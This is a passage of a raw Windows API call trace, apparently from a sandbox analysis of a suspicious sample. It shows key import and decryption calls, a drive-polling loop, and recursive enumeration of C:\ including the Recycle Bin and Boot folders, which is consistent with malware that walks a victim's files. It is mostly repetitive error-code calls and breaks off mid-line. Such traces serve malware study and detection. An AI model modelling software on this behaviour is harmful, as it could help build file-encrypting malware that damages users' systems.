[0111.115] CloseHandle (hObject=0x254) returned 1 [0111.115] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016e40 [0111.115] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0xe) returned 0x3016e28 [0111.115] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833b2e, lpParameter=0x3016e40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x254 [0111.116] CloseHandle (hObject=0x254) returned 1 [0111.116] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0xffffffff) returned 0x0 [0124.857] CloseHandle (hObject=0x250) returned 1 [0124.857] CloseHandle (hObject=0x24c) returned 1 [0124.857] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5530 | out: hHeap=0x1db0000) returned 1 [0124.857] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 Thread: id = 100 os_tid = 0x728 [0111.114] GetLogicalDrives () returned 0x4 [0111.114] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db16d0 [0111.114] CryptImportKey (in: hProv=0x254d70, pbData=0x386fd08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x386fd70 | out: phKey=0x386fd70*=0x29bfe0) returned 1 [0111.114] CryptSetKeyParam (hKey=0x29bfe0, dwParam=0x1, pbData=0x386fd58, dwFlags=0x0) returned 1 [0111.114] CryptDecrypt (in: hKey=0x29bfe0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x386fd24 | out: pbData=0x1db16d0, pdwDataLen=0x386fd24) returned 1 [0111.115] CryptDestroyKey (hKey=0x29bfe0) returned 1 [0111.115] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x1db5778 [0111.115] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x258 [0111.115] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x25c [0111.115] GetLogicalDrives () returned 0x4 [0111.115] Sleep (dwMilliseconds=0x3e8) [0112.215] GetLogicalDrives () returned 0x4 [0112.215] Sleep (dwMilliseconds=0x3e8) [0113.572] GetLogicalDrives () returned 0x4 [0113.572] Sleep (dwMilliseconds=0x3e8) [0114.688] GetLogicalDrives () returned 0x4 [0114.688] Sleep (dwMilliseconds=0x3e8) [0115.821] GetLogicalDrives () returned 0x4 [0115.821] Sleep (dwMilliseconds=0x3e8) [0116.988] GetLogicalDrives () returned 0x4 [0116.988] Sleep (dwMilliseconds=0x3e8) [0118.001] GetLogicalDrives () returned 0x4 [0118.002] Sleep (dwMilliseconds=0x3e8) [0119.120] GetLogicalDrives () returned 0x4 [0119.120] Sleep (dwMilliseconds=0x3e8) [0120.157] GetLogicalDrives () returned 0x4 [0120.157] Sleep (dwMilliseconds=0x3e8) [0121.312] GetLogicalDrives () returned 0x4 [0121.312] Sleep (dwMilliseconds=0x3e8) [0122.340] GetLogicalDrives () returned 0x4 [0122.340] Sleep (dwMilliseconds=0x3e8) [0123.403] GetLogicalDrives () returned 0x4 [0123.403] Sleep (dwMilliseconds=0x3e8) [0124.468] CloseHandle (hObject=0x25c) returned 1 [0124.468] CloseHandle (hObject=0x258) returned 1 [0124.468] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0124.468] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 Thread: id = 101 os_tid = 0x784 [0111.511] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x38) returned 0x1db1718 [0111.511] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x18) returned 0x1db5850 [0111.511] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x264 [0111.511] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x268 [0111.511] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x26c [0111.511] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x302bed8 [0111.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x833957, lpParameter=0x32af970, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0111.514] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x833957, lpParameter=0x32af970, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0111.515] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x304bee8 [0111.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 0x29bfe0 [0111.516] GetLastError () returned 0x0 [0111.516] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x214) returned 0x1db9650 [0111.517] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0111.517] GetCurrentThreadId () returned 0x784 [0111.517] SetLastError (dwErrCode=0x0) [0111.517] GetLastError () returned 0x0 [0111.517] SetLastError (dwErrCode=0x0) [0111.517] GetLastError () returned 0x0 [0111.517] SetLastError (dwErrCode=0x0) [0111.517] GetLastError () returned 0x0 [0111.517] SetLastError (dwErrCode=0x0) [0111.517] GetLastError () returned 0x0 [0111.517] SetLastError (dwErrCode=0x0) [0111.517] GetLastError () returned 0x0 [0111.517] SetLastError (dwErrCode=0x0) [0111.517] GetLastError () returned 0x0 [0111.517] SetLastError (dwErrCode=0x0) [0111.517] GetLastError () returned 0x0 [0111.518] SetLastError (dwErrCode=0x0) [0111.518] GetLastError () returned 0x0 [0111.518] SetLastError (dwErrCode=0x0) [0111.518] GetLastError () returned 0x0 [0111.518] SetLastError (dwErrCode=0x0) [0111.518] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x305bef0 [0111.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0x29c020 [0111.518] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.518] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.518] GetLastError () returned 0x0 [0111.518] SetLastError (dwErrCode=0x0) [0111.519] GetLastError () returned 0x0 [0111.519] SetLastError (dwErrCode=0x0) [0111.519] GetLastError () returned 0x0 [0111.519] SetLastError (dwErrCode=0x0) [0111.519] GetLastError () returned 0x0 [0111.519] SetLastError (dwErrCode=0x0) [0111.519] GetLastError () returned 0x0 [0111.519] SetLastError (dwErrCode=0x0) [0111.519] GetLastError () returned 0x0 [0111.519] SetLastError (dwErrCode=0x0) [0111.519] GetLastError () returned 0x0 [0111.519] SetLastError (dwErrCode=0x0) [0111.519] GetLastError () returned 0x0 [0111.519] SetLastError (dwErrCode=0x0) [0111.519] GetLastError () returned 0x0 [0111.519] SetLastError (dwErrCode=0x0) [0111.519] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x306bef8 [0111.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c060 [0111.520] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.520] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.520] GetLastError () returned 0x0 [0111.520] SetLastError (dwErrCode=0x0) [0111.520] GetLastError () returned 0x0 [0111.520] SetLastError (dwErrCode=0x0) [0111.520] GetLastError () returned 0x0 [0111.520] SetLastError (dwErrCode=0x0) [0111.520] GetLastError () returned 0x0 [0111.520] SetLastError (dwErrCode=0x0) [0111.520] GetLastError () returned 0x0 [0111.520] SetLastError (dwErrCode=0x0) [0111.520] GetLastError () returned 0x0 [0111.520] SetLastError (dwErrCode=0x0) [0111.520] GetLastError () returned 0x0 [0111.520] SetLastError (dwErrCode=0x0) [0111.520] GetLastError () returned 0x0 [0111.520] SetLastError (dwErrCode=0x0) [0111.520] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.521] SetLastError (dwErrCode=0x0) [0111.521] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.522] GetLastError () returned 0x0 [0111.522] SetLastError (dwErrCode=0x0) [0111.523] GetLastError () returned 0x0 [0111.523] SetLastError (dwErrCode=0x0) [0111.523] GetLastError () returned 0x0 [0111.523] SetLastError (dwErrCode=0x0) [0111.523] GetLastError () returned 0x0 [0111.523] SetLastError (dwErrCode=0x0) [0111.523] GetLastError () returned 0x0 [0111.523] SetLastError (dwErrCode=0x0) [0111.523] GetLastError () returned 0x0 [0111.523] SetLastError (dwErrCode=0x0) [0111.523] GetLastError () returned 0x0 [0111.523] SetLastError (dwErrCode=0x0) [0111.523] GetLastError () returned 0x0 [0111.523] SetLastError (dwErrCode=0x0) [0111.523] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.524] SetLastError (dwErrCode=0x0) [0111.524] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.525] SetLastError (dwErrCode=0x0) [0111.525] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.526] GetLastError () returned 0x0 [0111.526] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.527] GetLastError () returned 0x0 [0111.527] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.528] SetLastError (dwErrCode=0x0) [0111.528] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.529] SetLastError (dwErrCode=0x0) [0111.529] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] GetLastError () returned 0x0 [0111.530] SetLastError (dwErrCode=0x0) [0111.530] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.530] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.531] SetLastError (dwErrCode=0x0) [0111.531] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.532] GetLastError () returned 0x0 [0111.532] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.533] SetLastError (dwErrCode=0x0) [0111.533] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.534] SetLastError (dwErrCode=0x0) [0111.534] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.535] SetLastError (dwErrCode=0x0) [0111.535] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.536] SetLastError (dwErrCode=0x0) [0111.536] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.537] SetLastError (dwErrCode=0x0) [0111.537] GetLastError () returned 0x0 [0111.538] SetLastError (dwErrCode=0x0) [0111.538] GetLastError () returned 0x0 [0111.538] SetLastError (dwErrCode=0x0) [0111.538] GetLastError () returned 0x0 [0111.538] SetLastError (dwErrCode=0x0) [0111.538] GetLastError () returned 0x0 [0111.538] SetLastError (dwErrCode=0x0) [0111.538] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.538] FindClose (in: hFindFile=0x29c060 | out: hFindFile=0x29c060) returned 1 [0111.538] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.538] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0 [0111.538] FindClose (in: hFindFile=0x29c020 | out: hFindFile=0x29c020) returned 1 [0111.538] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0111.538] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.538] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0x29c020 [0111.538] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.538] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.539] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.539] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.539] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.539] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.539] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.539] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0111.599] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.599] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: 